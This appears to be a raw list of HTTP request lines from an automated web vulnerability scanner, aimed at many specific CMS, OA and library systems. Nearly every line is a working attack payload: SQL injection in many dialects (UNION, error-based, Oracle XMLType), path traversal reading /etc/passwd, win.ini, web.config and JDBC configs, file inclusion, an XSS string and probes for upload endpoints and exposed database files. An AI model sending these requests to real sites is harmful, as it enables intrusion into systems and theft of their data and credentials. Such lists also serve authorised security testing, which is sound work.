HEAD /download.aspx?id=337&accessory=UploadFile/softdown/../../web.config
GET /cms/web/testsql.jsp
POST /web/zwdt/jjj.BjcxServlet
GET /login.php?LOGIN_USER_INCLUDE=/etc/passwd
POST /cms/client/uploadpic_html.jsp?toname=test.jsp&diskno=webscan
POST /cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=11&AddWebColumnID=22&filepath=/app/
GET /columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,md5(1122),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%23
GET /columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%23
GET /webUser/webUser!list.action
GET /logincheck.php?UNAME=cfreer%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
GET /module/AIP/upload.php?T_ID=1&RUN_ID=1%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
POST /admin/annual/delete_leave.post.php
GET /admin/workingsituation/check.php?uid=3%20and%201%3D%28updatexml%281%2Cconcat%280x5e24%2C%28select%20md5%281122%29%29%2C0x5e24%29%2C1%29%29&project=459&type=task&name=bbb
GET /admin/workingsituation/download_excel.php?day=30&start=&end=&project=0&uid=3%20and%201%3D%28updatexml%281%2Cconcat%280x5e24%2C%28select%20md5%281122%29%29%2C0x5e24%29%2C1%29%29%23&task=0
GET /admin/workingsituation/ajax.php?task_id=10039s&type=update_status&status=1s%27%20and%201%3D%28updatexml%281%2Cconcat%280x23%2C%28select%20md5%281122%29%29%2C0x23%29%2C1%29%29%23
GET /down.asp?cat_%69d=3%20and%201=2%20union%20select%201,'ijx',3,4,5,6,7,8,9,10,11,12,13%20from%20admin
POST /jdwm/cgi/getpwd.cgi
GET /public/jspdownload.jsp?FileFullPath=%5Cetc%5Cpasswd&FileName=passwd
GET /public/jspdownload.jsp?FileFullPath=c:%5Cwindows%5Cwin.ini&FileName=win.ini
GET /cms/web/jspdownload.jsp?FileUrl=c:%5Cwindows%5Cwin.ini
GET /cms/web/jspdownload.jsp?FileUrl=%5Cetc%5Cpasswd
GET /cms/web/dimensionpic.jsp?action=copy&SrcPicPath=/WEB-INF/web.xml&PicPath=/cms/web/reer.txt
GET /CorpInfo/CorpBaseInfo.aspx?CorpCode=1122'%20and%201=char(106)%20--
GET /CorpInfo/CorpAptitudeInfo.aspx?CorpCode=1122'%20and%201=char(106)%20--
GET /CorpInfo/PersonnelList.aspx?CorpCode=1122'%20and%201=char(106)%20--
GET /CorpInfo/CorpAchievementList_SG.aspx?CorpCode=1122'%20and%201=char(106)%20--
GET /Credit/ShowCorpCredit.aspx?CorpCode=1122'%20and%201=char(106)%20--
GET /CorpInfo/CorpDeBox.aspx?CorpCode=1122'%20and%201=char(106)%20--
GET /CorpInfo/CorpRewardsList.aspx?RewardsPunishment=1122&CorpCode=1122'%20and%201=char(106)%20--
GET /BM/Project/HistoryBindSegmentLeftList.aspx?CorpType=1122&CorpCode=1122'%20and%201=char(106)%20--
GET /CorpInfo/CorpSendLeftTree.aspx?JoinID=1122&CorpCode=1122'%20and%201=char(106)%20--
GET /forUI/Policy/showPolicy.aspx?ID=1122'%20and%201=char(106)%20--
GET /forUI/Person/EmplInfo.aspx?IDCard=1122'%20AND%201=CHAR(106)%20--%20
GET /forUI/Policy/DO.file?ID='%20or%201=char(106)%20--
GET /search/index/portalId/427?keyword=1'%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(114)%7C%7Cchr(101)%7C%7Cchr(106)%7C%7Cchr(101)%7C%7Cchr(114)%20FROM%20dual)))%7C%7C'
POST /Ajax_Handle/UploadAttachmentHandler.ashx
GET /ExtendForm/Down/Technological.aspx?id=1'%20and%201=char(106)%20--
POST /public/editext/up/soundsave.asp
POST /public/AspUpload/upload.asp?path=../../upload&processid=1
GET /xyEmployee_checkLoginForUser.do?userName=reer
GET /opac/ajax_get_file.php?filename=../admin/opacadminpwd.php
GET /zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php
GET /kc_view.php?id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x5c,md5(1122),0x5c),NULL#
GET /kecheng.php?id=-1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL#%20
GET /kecheng_view.php?id=-1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
GET /include/ad.php?id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
GET /index.php?language_id=1%20and%20%20%28SELECT%201%20from%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28select%28md5%281122%29%29%29%2C1%2C62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23&is_protect=1&action=cccc
GET /picnews.asp?%69d=-1%20and%201=2%20union%20select%201,2,3,chr(106),5,6,7,8,9,10,11,12%20from%20admin
HEAD /opensoft.asp?%69d=10%20and%201=2
GET /phpsso_server/?m=phpsso&c=index&a=getapplist&appid=1&data=
POST /bmsltxDetail.do
POST /setAcceptance.do
POST /setAcceptance.do
GET /setMaterials.do?ITEM_ID=12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /intoSpDept.do?bmid=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /admin/payonline.php/login.php?table=information_schema.SCHEMATA%20where%201=(select%201%20from%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
GET /nobom.php
GET /infoDisplayAction.do?method=listDeptInformationInFolderStyle&pageURL=/application/oa/information/view/buu_list.jsp&interval=5&departmentId=1'%20AND%209935=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)%7C%7CCHR(112)%7C%7CCHR(102)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7C(SELECT%20(CASE%20WHEN%20(9935=9935)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(117)%7C%7CCHR(115)%7C%7CCHR(115)%7C%7CCHR(113))%20AND%20'keyi'='keyi&filters=
GET /lm/front/mailhotlist.jsp?editpagename=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&sysid=001
GET /lm/front/findpsw.jsp?editpagename=&groupid=&sysid=../../../../../../../../../../etc/passwd%00.jpg
GET /admin/Admin_Config.asp
GET /Project_SPInfoList.aspx?CategoryCode=1'%20and%201=char(106)%20--
GET /zxts_view.aspx?Id=4%20and%201=char(106)%20--&GBType=1
POST /FileUpload
GET /oa_server/App_Pages/App_page/user_update.aspx?userid=172
GET /api.php?c=api&f=phpok&id=_sublist&param[pid]=1%20union%20select%20concat(md5(1122),0x7c,pass),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9%20from%20qinggan_user%23&param[phpok]=1
GET /conformID.asp?Tid=jx'%20and%201=char(106)%20--
GET /DelAccessID.asp?AccessID=1'%20and%201=char(106)%20--&Datetime=
HEAD /KS_Data/KesionCMS6.mdb
HEAD /KS_Data/KesionCMS7.mdb
HEAD /KS_Data/KesionCMS8.mdb
HEAD /KS_Data/KesionCMS9.mdb
GET /conformID.asp?Tname=web'%20/**/and/**/1=char(106)--
POST /Asearch.asp
GET /linklist.asp?TlinkID=26'/**/and/**/1=char(106)--
GET /zyjs.asp?Txy=18&tzy=11'%20/**/and/**/1=char(106)%20--
GET /Biogenic.asp?Tbynf=21'%20and%201=char(106)%20--
GET /specialty.asp?Tbynf=1%20and%201%3Echar(106)%20--
GET /api.php?op=video_api&pc_hash=1&uid=1&snid=1122%22%20onmouseover=alert(42873)//&do_complete=1
GET /toall/desktop/dbform.asp?fn=&fntxt=&varid=8%20AND%201122%3DCONVERT%28INT%2C%28CHAR%2899%29%2bCHAR%28102%29%2bCHAR%28114%29%2bCHAR%28101%29%2bCHAR%28101%29%2bCHAR%28114%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28106%29%2bCHAR%28120%29%29%29
GET /index.php?c=ajax&a=member_login&template=../../ooxx.php
HEAD /addcontent/webEditor/upload/files/file_down.jsp?filename=/../../../../WEB-INF/web.xml
HEAD /addcontent/webEditor/upload/files/file_down.jsp?filename=/.xx/./.xx/./.xx/./.xx/./WEB-INxx/F/web.xml
GET /Tools/FileTool/Manage/Notepad.aspx?objfile=C:/windows/win.ini
GET /Tools/FileTool/Manage/Notepad.aspx?objfile=/etc/passwd
GET /workflow/flow_details.aspx?action=details&job_id=-12%20and%201=char(106)
POST /search.aspx
HEAD /servlet/fileOpenforms?filename=/index.jsp
HEAD /application/gzhd/bgxz/download.jsp?filename=/index.jsp
GET /livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1122'%20and%201=char(106)%20--
GET /truexxgk/app/nrglController/loadZwgk?zdjc=reer'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd&type=1
GET /NewsList.asp
GET /ActivityList.asp
GET /WidgetsHandler.ashx?widget=reer'%20where%201=1%20AND%20char(106)%3E0--
POST /common/guestbook.php
POST /common/help.php
GET /Comment/Comment.aspx?id=11'%20and%201=char(106)%20--
POST /wap/index.php?a=newslist
GET /index.php?_COOKIE[cfg][database]=mysql&_COOKIE[cfg][db_host]=localhost&_COOKIE[cfg][db_user]=webscan&_COOKIE[cfg][db_pass]=reer&_COOKIE[cfg][db_name]=db
GET /?question/tag/0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html
GET /?question/search/tag:0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html
POST /admin/uploadFile.action
GET /Adminiscentertrator/AdmIndex.asp
POST /Adminiscentertrator/AdmLinkInsert.asp
GET /corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /NewsList.asp
GET /bit-xxzs/xmlpzs/bsdetail.asp?id=-306'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
GET /bit-xxzs/xmlpzs/ysxkdetail.asp?permitsaleno=-306'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
GET /index.php?case=archive&act=orders&aid[aid%60%3D2%20and%200%20union%20select%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,md5(1122),36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58%20from%20cmseasy_user%20where%20userid%3C2%20%20--%20%20a]=26
GET /zhanshi/equzhanshi.aspx?equid=-301'%20and%201=char(106)%20--
GET /prozhanshi/zice.aspx?id=-101'%20and%201=char(106)%20AND%20'at'='at
GET /prozhanshi/yuxi.aspx?id=-306'%20and%201=char(106)%20and%20'at'='at
GET /truexxgk/app/xxgkznController/firstXxgkznByZdjc/'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
GET /zhanshikebiao.aspx?centid=-301'%20and%201=char(106)%20--&date=&xyid=
GET /bit-xxzs/xmlpzs/builddetail.asp?buildid=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
POST /bit-xxzs/xmlpzs/webissue.asp
GET /article/file/cid/-306/?file=../../../../../../../../../../etc/passwd&method=in
GET /bit-xxzs/xmlpzs/fwsyqdetail.asp?certno=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
POST /bit-xxzs/xmlpzs/nowwebissue.asp
GET /bit-xxzs/xmlpzs/nowdetail.asp?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
POST /bit-xxzs/xmlpzs/prewebissue.asp
POST /epstar/servlet/RaqFileServer?action=save&fileName=test.txt
GET /epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml
GET /www/item_seach.php?tempsql=and%201=2%20UNION%20SELECT%201,2,concat(0x7c,md5(1122),0x7c),4,5,6,7,8,9,10,11,12,13%23
HEAD /body/Function/download.asp?filepath=../download.asp&filename=download
GET /news/news_details.aspx?id=-1&coid=-5%20and%201=char(106)%20--
GET /install/step4.aspx
GET /admin/Role/Role_List.aspx
GET /sofpro/SltGecsMember?actiontype=WEB_EDIT_DETAIL&member_seq=-1
POST /admin/operupload.asp
POST /member/findAddressById.json
POST /member/zoneNm.json
GET /main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,0x6366726565723A696A78,3%20from%20H_System_User--
HEAD /i/ireportclient/fmgr/downloadhelpfile.jsp?file=/../conf/jdbc.conf
GET /api/uc.php?code=c2f4ZUxs8zoTQY250F1rAWrUX3HdH02DmJ%2B35SmPeYiZ4McfmrkhoXXy9iGUKw86jzY%2B%2F43CtUlnJtwQFcGhRIgJlqvJeZbHGdNSNyMC2VT9SjlxPpWveWUzynqY4%2FQnruPHVh%2FTxtjrrdBZhZXOqEDm1JBEB10PlawipFuTPtFKt08G2MSMWRRL5dKcXsmwIXKj4YJH%2BBD4cnwYwZVvqyjSTqMoB9nB6xYfwhedhJp%2B6Y%2BC5ZgHq0QnvYCmgGcHds1hKQDzp7vnEnyQSrFIZsfMTpbTIU8jrGOqBg
POST /search.php
GET /opac/index.jsp?page=../web-inf/web.xml
HEAD /datacenter/ueditor/downAttach.do?url=../../../../../../../../../../etc/passwd
GET /datacenter/ckfile.do?path=../../../../../../../../../../etc/passwd
GET /account.t?op=showAccountList
GET /oa_server/App_Pages/App_page/News_add.aspx
POST /truexxgk/app/YsqgkController/smallQuery?type=1
POST /truexxgk/app/YsqgkController/smallQuery?type=1
GET /store.php?Uid=1-db_mymps-my_member%60%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /detail.asp?id=-306/**/And/**/1=char(106)--&&t=
GET /content/index.php?cid=1%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
GET /content/detail.php?tid=1%20AND%20(SELECT%203047%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
GET /admincp.php?action=criterion&todo=list&id=1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
GET /index.php?action=article&do=show&todo=content&a=282%20AND%20(SELECT%203853%20FROM(SELECT%20COUNT(*),CONCAT(0x6366726565723A,(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)),0x3A696A783A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
POST /UploadHandler.ashx
GET /index.php?action=teacher&teacher_id=(SELECT%201833%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&todo=infor
GET /class.php?action=news&do=39&dpid=68&m=(SELECT%201833%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&todo=station
POST /admincp.php?action=/../teacher/video&mid=18&todo=word&do=word_upload&action_word=FILE
POST /post.php?act=phpok&id=12
POST /weixin/index.php?m=index&c=index
POST /work_flow/formOptJSPUpload.jsp?flag=1
POST /work_flow/formStartJSPUpload.jsp?flag=1
POST /admin/mbgl/editmb_addok.jsp?ModelFile=/cesi.jsp
POST /public/editor/tpsc1.jsp?flag=sc
GET /outImg?imgPath=c:/boot.ini
GET /outImg?imgPath=/etc/passwd
POST /gsgl.asp?stype=
GET /common/codeMoreWidget.jsp?code=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
GET /piw/Member/UploadMemberAttach.jsp
GET /piw/School/SchoolTypeRegion.jsp?table=information_schema.schemata/**/where/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)
GET /piw/Production/display/productSearch.jsp?keywords=1122'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)/**/and/**/'1'='1
GET /piw/MessageBoard/articleIframe.jsp?DataId=1&Code=2%27and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23
HEAD /cardload.jsp?filename=../etc/passwd&maininfo_id=-12
GET /systems/dept/dept_edit.aspx?CodeId=-4)%20and%201=char(106)--&id=1057
GET /show.asp?id=2621%20union%20SELECT%201,2,0x7700650062007300630061006E003A0066006F0075006E0064003A00760075006C00,4,5,6,7,8,9,10,11,12,13,14,15,16%20FROM%20ADMIN
GET /FileManages/FolderQxSet/Modify.aspx?type=2&id=-12/**/and/**/1=char(106)--
GET /Educational/Register.aspx?clientid=uName&uName=webscan'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7765627363616E3A666F756E643A76756C,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a);%23
GET /news/huiyidetails.aspx?action=serach&id=1%20and%201=char(106)
GET /OA/renshigongzi/xuexi.asp?tname=admin'%20UNION%20SELECT%201,2,0x66696E643A76756C,0x7765627363616E3A666F756E643A76756C,5,6,7%20from%20teachers--
GET /Consultant/zsklist.aspx?categoryNum=-004'%20and%201=char(106)%20--
GET /wywzlist.aspx?OUGuid=1')%20and%201=char(106)%20--%20
GET /answeredcaselist.aspx?OUName=1'%20and%201=char(106)%20--
POST /member.php?act=updateinfo
POST /site56/LmsOrder/trackOrder.jspx
GET /house/ProcManage/WebHouse/HousePic.aspx
GET /CommPage/imgbrowse.aspx?id=1&keycode=2'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--
GET /CommPage/ShowImg.aspx?keycode=a&id=1&page=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--
HEAD /_controls/upfile/UpFile_Main_Down.aspx?p_docname=Default.aspx&p_filename=../Default.aspx&p_open_type=_blank&random=
GET /FAQ/FaqLoading.aspx?id=-1122%20and%201=char(106)
POST /loginverify.asp
POST /newssearch.cfm
GET /mainpage/msglog.aspx?user=-1'%20and+1=char(106)--
GET /news_display.php?id=2%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(0x7765627363616E3A,(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),0x3A66696E643A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
HEAD /down.aspx?Url=../web.config
HEAD /showpage/fjxz.jsp?fjlj=/showpage/fjxz.jsp
GET /sssweb/onlineVote/fvote.aspx?questionnaireID=-11'%20and%201=char(106)%20--
GET /opacOpenurl/getOpenUrlByBookId/-1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)
GET /journal_guide?inital=T&marc_type=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)&subtag=&tag=
GET /getClassNumberTree?id=1'%7C%7C(SELECT%201%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'&lv=0&n=
GET /getCollection?libId=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&_=
GET /MyDocument/Serach.aspx?mess=as%25'/**/and%201=char(106)%20--
GET /install/install.php.lock?step=2
GET /cms/cms/webapp/search/search-conf.jsp?appid=1&func=loadcol&webid=main'%20UNION%20ALL%20SELECT%20NULL,NULL,CHR(72)%7C%7CCHR(75)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
